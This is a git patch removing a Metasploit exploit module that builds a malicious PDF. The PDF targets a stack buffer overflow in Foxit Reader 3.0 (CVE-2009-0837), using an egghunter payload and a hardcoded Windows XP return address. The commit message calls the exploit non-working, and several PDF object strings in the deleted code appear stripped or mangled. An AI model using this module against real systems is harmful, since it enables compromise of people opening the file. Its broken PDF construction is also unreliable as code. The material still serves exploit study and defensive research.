From 3eff1cfaa5e9e88d4386ca17919305fd3bf77930 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 27 Oct 2011 01:47:48 +0000 Subject: [PATCH] This exploit does not work at all, and could not be fixed in time. See #5854 git-svn-id: file:///home/svn/framework3/trunk@14088 4d416f70-5f16-0410-b530-b9f4589650da --- .../fileformat/foxit_pdf_action_bof.rb | 113 ------------------ 1 file changed, 113 deletions(-) delete mode 100644 modules/exploits/windows/fileformat/foxit_pdf_action_bof.rb diff --git a/modules/exploits/windows/fileformat/foxit_pdf_action_bof.rb b/modules/exploits/windows/fileformat/foxit_pdf_action_bof.rb deleted file mode 100644 index 916f7d6097..0000000000 --- a/modules/exploits/windows/fileformat/foxit_pdf_action_bof.rb +++ /dev/null @@ -1,113 +0,0 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' -require 'zlib' - -class Metasploit3 < Msf::Exploit::Remote - Rank = GoodRanking - - include Msf::Exploit::FILEFORMAT - include Msf::Exploit::PDF - include Msf::Exploit::Egghunter - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow', - 'Description' => %q{ - This module exploits a stack based buffer overflow in Foxit Reader 3.0 builds 1301 and earlier. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'bannedit', # Metasploit module - ], - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE' , '2009-0837' ], - [ 'OSVDB', '55614' ], - [ 'BID', '34035'], - [ 'URL', 'http://www.coresecurity.com/content/foxit-reader-vulnerabilities'], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', - }, - 'Payload' => - { - 'Space' => 316, - 'BadChars' => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x22\x28\x29\x2F\x5c\x3c\x3e\x5e\x7e" - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Foxit Reader 3.0 Windows XP SP3', { 'Ret' => 0x01847e7a} ], # ebp + offset - ], - 'DisclosureDate' => 'Mar 09 2009', - 'DefaultTarget' => 0)) - - register_options([ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), - ], self.class) - - end - - def exploit - pdf = make_pdf - file_create(pdf) - handler - end - - def make_pdf - hunter, egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true }) - - action = "\n<>/NewWindow true>>" - - pdf = "%PDF-1.4\n" - pdf << "1 0 obj\n" - pdf << "<>/Contents 2 0 R " - pdf << "/Annots[ 24 0 R 25 0 R 9 0 R ]>>\n" - pdf << "endobj\n" - pdf << "4 0 obj\n" - pdf << "<>\n" - pdf << "endobj\n" - pdf << "7 0 obj\n" - pdf << "<>\n" - pdf << "endobj\n" - pdf << "9 0 obj\n" - pdf << "<>/BE<>/MK<>>>/AP<>/T()/A 12 0 R /AA 17 0 R >>\n" - pdf << "endobj\n" - pdf << "16 0 obj\n" - pdf << action - pdf << "endobj\n" - pdf << "17 0 obj\n" - pdf << "<>\n" - pdf << "endobj\n" - pdf << "trailer\n" - pdf << "<<00000000000000000000000000000000>]" - pdf << "/DocChecksum/00000000000000000000000000000000/Size 31>>\n" - pdf << "startxref\n" - pdf << "0000\n" - pdf << "%%EOF\n" - pdf - end -end \ No newline at end of file